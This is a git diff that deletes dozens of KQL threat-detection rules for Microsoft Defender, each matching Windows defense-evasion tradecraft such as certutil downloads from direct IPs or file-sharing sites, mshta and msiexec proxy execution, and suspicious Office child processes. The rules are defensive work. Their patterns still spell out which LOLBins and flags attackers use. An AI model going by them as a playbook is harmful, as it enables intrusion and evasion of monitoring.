-// Level: medium
-// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not(((FolderPath contains "\\{" and FolderPath contains "}\\") or FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql b/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql
deleted file mode 100644
index 36f6b599..00000000
--- a/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/23
-// Level: medium
-// Description: Uses the .NET InstallUtil.exe application in order to execute image without log
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Extexport_Execution.kql b/Defense Evasion/Suspicious_Extexport_Execution.kql
deleted file mode 100644
index 35568b7e..00000000
--- a/Defense Evasion/Suspicious_Extexport_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Extexport.exe loads dll and is execute from other folder the original path
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "Extexport.exe" or FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql b/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql
deleted file mode 100644
index dcfdf274..00000000
--- a/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Extract data from cab file and hide it in an alternate data stream
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql b/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql
deleted file mode 100644
index d2f5c2de..00000000
--- a/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/09
-// Level: high
-// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql b/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index f12091dd..00000000
--- a/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
-// Tags: attack.persistence, attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql b/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
deleted file mode 100644
index 99d431f0..00000000
--- a/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
-// Tags: attack.defense_evasion, attack.execution
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql
deleted file mode 100644
index 50e632ee..00000000
--- a/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql
deleted file mode 100644
index e9033362..00000000
--- a/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index 195823a7..00000000
--- a/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: high
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql b/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql
deleted file mode 100644
index 9f95881c..00000000
--- a/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
-// Tags: attack.t1036.005, attack.defense_evasion
-DeviceFileEvents
-| where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_GUP_Usage.kql b/Defense Evasion/Suspicious_GUP_Usage.kql
deleted file mode 100644
index 4b5e7075..00000000
--- a/Defense Evasion/Suspicious_GUP_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/02/06
-// Level: high
-// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql b/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql
deleted file mode 100644
index da1a04b7..00000000
--- a/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/04/23
-// Level: high
-// Description: Get-Variable is a valid PowerShell cmdlet
-WindowsApps is by default in the path where PowerShell is executed.
-So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
-
-// Tags: attack.persistence, attack.t1546, attack.defense_evasion, attack.t1027
-DeviceFileEvents
-| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_HH.EXE_Execution.kql b/Defense Evasion/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Defense Evasion/Suspicious_HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql b/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql
deleted file mode 100644
index a625bfda..00000000
--- a/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/09
-// Level: informational
-// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql b/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql
deleted file mode 100644
index 04a154d3..00000000
--- a/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql b/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql
deleted file mode 100644
index 8b9e448e..00000000
--- a/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects execution of javascript code using "mshta.exe".
-// Tags: attack.defense_evasion, attack.t1218.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql b/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql
deleted file mode 100644
index ab40eb86..00000000
--- a/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/11/07
-// Level: medium
-// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
-
-// Tags: attack.defense_evasion, attack.t1036.007
-DeviceFileEvents
-| where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_MSDT_Parent_Process.kql b/Defense Evasion/Suspicious_MSDT_Parent_Process.kql
deleted file mode 100644
index 294e0977..00000000
--- a/Defense Evasion/Suspicious_MSDT_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nextron Systems
-// Date: 2022/06/01
-// Level: high
-// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
-// Tags: attack.defense_evasion, attack.t1036, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_MSHTA_Child_Process.kql b/Defense Evasion/Suspicious_MSHTA_Child_Process.kql
deleted file mode 100644
index 0e72056c..00000000
--- a/Defense Evasion/Suspicious_MSHTA_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag
-// Date: 2019/01/16
-// Level: high
-// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
-// Tags: attack.defense_evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql b/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql
deleted file mode 100644
index 255e5e51..00000000
--- a/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io -// Date: 2018/04/06 -// Level: high -// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) -// Tags: attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or 
FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql b/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql deleted file mode 100644 index 271488d2..00000000 --- a/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/11/17 -// Level: medium -// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql b/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql deleted file mode 100644 index 4facc676..00000000 --- a/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/16 -// Level: medium -// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads -// Tags: attack.t1218.007, attack.defense_evasion -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql b/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql deleted file mode 100644 index 367b993a..00000000 
--- a/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/01/16 -// Level: medium -// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. -Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) - -// Tags: attack.defense_evasion, attack.t1218.007 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\"))) \ No newline at end of file 
diff --git a/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql b/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql deleted file mode 100644 index e611a0b5..00000000 --- a/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/28 -// Level: medium -// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly -// Tags: attack.defense_evasion, attack.t1218.007 -DeviceProcessEvents -| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql b/Defense 